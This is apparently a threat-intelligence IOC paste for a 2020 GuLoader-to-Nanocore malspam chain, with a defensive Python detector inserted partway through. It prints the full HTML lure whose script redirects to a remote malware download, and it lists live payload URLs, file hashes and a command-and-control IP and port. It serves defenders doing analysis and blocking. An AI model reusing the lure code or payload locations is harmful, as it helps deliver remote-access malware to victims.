ExecuteMalware

2020-03-20 GuLoader_Nanocore IOCs

Mar 22nd, 2020
Email with file attachment named: #08492.html
#08492.html --> #08492.zip --> #0844.IMG --> #0844.exe --> SINSINCITY_encrypted_3280000.bin

#08492.html
===========
<html>
<head>
<title>#08492</title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
<script>
$(function() {
$('a[data-auto-download]').each(function(){
var $this = $(this);
setTimeout(function() {
window.location = $this.attr('href');
}, 2000);
});
});
</script>
</head>
<body>
<center><img src="https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe"></center></img>
<div class="wrapper">
<p>
<a data-auto-download href="https://www.sendspace.com/pro/dl/izzu4h"</a>.</p>
</div>
</body>
</html>


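A defender-side triage check for the lure pattern shown in the attachment above (a data-auto-download anchor plus a setTimeout/window.location redirect), added here as an example and not part of the original paste. SAMPLE_HTML is a constructed copy of the sample with placeholder URLs, and the function names are my own.

```python
import re

# Constructed sample modelled on the #08492.html lure above; the
# download and decoy URLs are placeholders, not the live ones.
SAMPLE_HTML = """<html>
<head>
<title>#08492</title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
<script>
$(function() {
$('a[data-auto-download]').each(function(){
var $this = $(this);
setTimeout(function() {
window.location = $this.attr('href');
}, 2000);
});
});
</script>
</head>
<body>
<center><img src="https://example.invalid/decoy.exe"></center></img>
<a data-auto-download href="https://example.invalid/pro/dl/PLACEHOLDER"</a>
</body>
</html>"""

# Anchor tags carrying data-auto-download; tolerant of the malformed
# markup in the real sample, where the <a> tag is never closed with '>'.
AUTO_DL_RE = re.compile(
    r'<a\b[^>]*\bdata-auto-download\b[^>]*?href=["\']([^"\']+)', re.I)
# Script text that assigns window.location from inside a setTimeout callback.
REDIRECT_RE = re.compile(r'setTimeout\s*\(.*?window\.location\s*=', re.I | re.S)


def auto_download_urls(html):
    """Return every href attached to a data-auto-download anchor."""
    return AUTO_DL_RE.findall(html)


def has_timed_redirect(html):
    """True if a script schedules a window.location change via setTimeout."""
    return REDIRECT_RE.search(html) is not None


def triage(html):
    """Summarise why an HTML attachment looks like a timed-redirect lure."""
    urls = auto_download_urls(html)
    timed = has_timed_redirect(html)
    return {"auto_download_urls": urls,
            "timed_redirect": timed,
            "suspicious": bool(urls) and timed}


if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
```

Run it over quarantined HTML attachments to flag candidates for sandboxing; the extracted URLs are the values worth blocking at the proxy.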
Downloads:
==========
First download:
psftp.exe (downloaded by first URL - probably legit Putty suite)
bc59fa5dbb11f5d286fc41e8f25c6cc0

Second download:
#08492.zip
9bc2cefa6128b6187c0d9cecde5ce608

Which contains:
https://www.virustotal.com/gui/file/ac8745e4fee242c12d6692c4c92adaec467f06aa0285e67018ee00dae717d2dd/detection
#0844.IMG
817788f932f5f5015adfff61767fb38f

Which contains (this should be the GuLoader file):
https://www.virustotal.com/gui/file/cd840d5ce4befb95f4ee4fdfd2bc312baa6983aebe52a127042dba03a3579576/detection
#0844.exe
6458cae5ef3ffe2de7fdab0c43f49f1c

Running the .exe downloads:
https://drive.google.com/uc?export=download&id=1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq

https://doc-0o-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9eo36211iggnk2iei9m347crmqbo86j9/1584719025000/01552400289149162477/*/1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq?e=download

Which downloads (this should be the encoded Nanocore file):
SINSINCITY_encrypted_3280000.bin
b9b1e5661689775a1fd2825ad98d36ba

Nanocore C2:
207.246.72.237:8806